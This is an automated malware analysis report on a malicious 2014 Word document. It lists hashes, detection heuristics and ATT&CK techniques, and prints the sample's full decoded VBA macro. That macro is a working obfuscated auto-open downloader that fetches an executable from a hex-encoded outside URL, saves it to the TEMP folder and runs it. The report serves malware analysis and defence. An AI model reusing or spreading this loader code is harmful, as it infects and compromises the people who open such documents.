Office (OLE) malware analysis — malicious · 0f66b81ba27fa0e1

MALICIOUS

Office (OLE)

54.0 KB Created: 2014-12-08 21:27:00 Authoring application: Microsoft Office Word First seen: 2015-01-04

MD5: ff0694cba3b1ba6b39c997528385e649 SHA-1: 913c55170aeb24353a055525485d9204cc21796c SHA-256: 0f66b81ba27fa0e18b6545ef0574fc8d1978ff8e6ce27ec14e32951e8e1a4a2b

274 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, indicated by critical heuristics like 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The VBA script attempts to use CreateObject and appears to be a downloader, likely executing a second-stage payload. The presence of auto-execution macros suggests it's intended to be delivered as a spearphishing attachment.

Heuristics 11

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe"

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8352 bytes
SHA-256: `6c8bc24b6332044f300e5774e785720c922521c7e3646e14c01a0bc2a9bbbc42`
Detection ClamAV: No threats found Obfuscation or payload: likely 45 of 89 identifiers look randomly generated (e.g. 'D6371647A747467686B6D6D7A66727066696D646') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function UDTTLHNNLLR(ByVal JZWYUDMMKHA As String, ByVal WFSSTRSIBJM As String) As Boolean Dim RYNLMLSHMMO As Object, GYMRNGSWQQQ As Long, UGNASOWUCJI As Long, XHXKIQBTCVN() As Byte GoTo vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp Dim yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75727A6577626A7873657979637A636B6B786F6A6B75676867696B777167746A666176737577786C626B78706E7A766462706F6277626B") For Binary As #24764 Put #24764, , yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld Close #24764 vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp: Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450")) GoTo gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba Dim ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("76796664646F756F696C6168626B6A7A62797A77786374637A74626C677466737361756C7565697973627A6E64786F6363726267786979") For Binary As #95221 Put #95221, , ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma Close #95221 gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba: RYNLMLSHMMO.Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("474554"), JZWYUDMMKHA, False GoTo uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt Dim pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75766163766E736175686766687666626A78726F696373646668726C676A676A636A6C666462797271776A6D6B726F61706761616E7378") For Binary As #9306 Put #9306, , pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg Close #9306 uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt: RYNLMLSHMMO.Send bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("E0EFF0EEC8C4CB") GoTo jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq Dim mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("747668736B61746162706D6A75786C7066706973656D65637877636E616669786D646C61777863647A6779707A76627A7575626A6D7361") For Binary As #61996 Put #61996, , mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr Close #61996 jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq: XHXKIQBTCVN = RYNLMLSHMMO.responseBody GoTo ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw Dim sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6574666267646763696567636969686273756D6162626D6972736E69736D726C657076786868717470637766767271756F75657772767A") For Binary As #60350 Put #60350, , sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx Close #60350 ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw: UGNASOWUCJI = FreeFile Open WFSSTRSIBJM For Binary As #UGNASOWUCJI Put #UGNASOWUCJI, , XHXKIQBTCVN Close #UGNASOWUCJI GoTo bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz Dim nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("706C68726B637772676D6E6E75656C6F6E627A646E756E7369766D7777716565646D6376697466757A6A78656662637171616769766465") For Binary As #90758 Put #90758, , nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi Close #90758 bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz: GoTo bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl Dim iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6E706A756575796E6E636D756C7071707475717A797462756E63796465746B78786C75636E727A646571667861766A73756C756E6A656D") For Binary As #69362 Put #69362, , iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc Close #69362 bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl: Set bBBBijgboj = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("5368656C6C2E4170706C69636174696F6E")) GoTo zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts Dim zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6C62757473677764747069747770707176746276616B6A6864637267706E79636B78717A6D69776B797067666975716A71726F7A736165") For Binary As #82676 Put #82676, , zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh Close #82676 zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts: bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe" End Function Sub Auto_Open() GoTo gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd Dim usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D666C73777475666F72706179686565636879666D6B6E6563707367787A65757A6B78627363626F636F677071716B6673656E636A6B67") For Binary As #70233 Put #70233, , usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr Close #70233 gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd: QTQFFWAVZYZ End Sub Sub AutoOpen() GoTo uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod Dim ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("7868736E61706A72717368786E66666E6372646C6A7A61696567616168776D75747564667763676D617475716777646F6272656C6C656C") For Binary As #99406 Put #99406, , ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl Close #99406 uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod: Auto_Open End Sub Sub Workbook_Open() GoTo xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz Dim tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("656C666B6564787670696C7864626A7375796E6C6674626A71736F647163657569756573716F6D72616E75656268777074776F6C657962") For Binary As #52822 Put #52822, , tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb Close #52822 xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz: Auto_Open End Sub GoTo ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru Dim mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi As String Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D6371647A747467686B6D6D7A66727066696D646C686C7167676776707477797469696C6B7463697876726F6E6E636B6C666C70706B77") For Binary As #3723 Put #3723, , mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi Close #3723 ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru: End Sub Sub QTQFFWAVZYZ() UDTTLHNNLLR bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("687474703A2F2F6F70656E737461636B73672E636F6D2F6A732F62696E2E657865"), Environ("TEMP") & "\ADGYMSEKRJE.exe" End Sub Public Function bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr(ByVal GVHUjdsf4f As String) As String Dim i As Long For i = 1 To Len(GVHUjdsf4f) Step 2 If 871851 = 871851 + 1 Then End If 6292 < 27 Then If 549589 = 549589 + 1 Then End If 2244 < 25 Then MsgBox ("ZRhNNOHl97") End If If Len("ZOhjMOnl6417") = Len("xeFXDFFY") Then MsgBox ("Error !!!") End If MsgBox ("fSlPSZnM79") End If If Len("CSHpvLRP9465") = Len("vhlxUkrj") Then If 272625 = 272625 + 1 Then End If 2624 < 82 Then MsgBox ("TQxnjYFY33") End If If Len("ZuzjUIji3464") = Len("rPTEHuGF") Then MsgBox ("Error !!!") End If MsgBox ("Error !!!") End If If 958631 = 958631 + 1 Then End If 7345 < 91 Then MsgBox ("aPgyRpZl73") End If If Len("aHfxvpdl1518") = Len("pRWkXaVk") Then MsgBox ("Error !!!") End If bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr = bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr & Chr$(Val("&H" & Mid$(GVHUjdsf4f, i, 2))) Next i End Function

Open this report in the interactive analyzer, or submit your own file for analysis.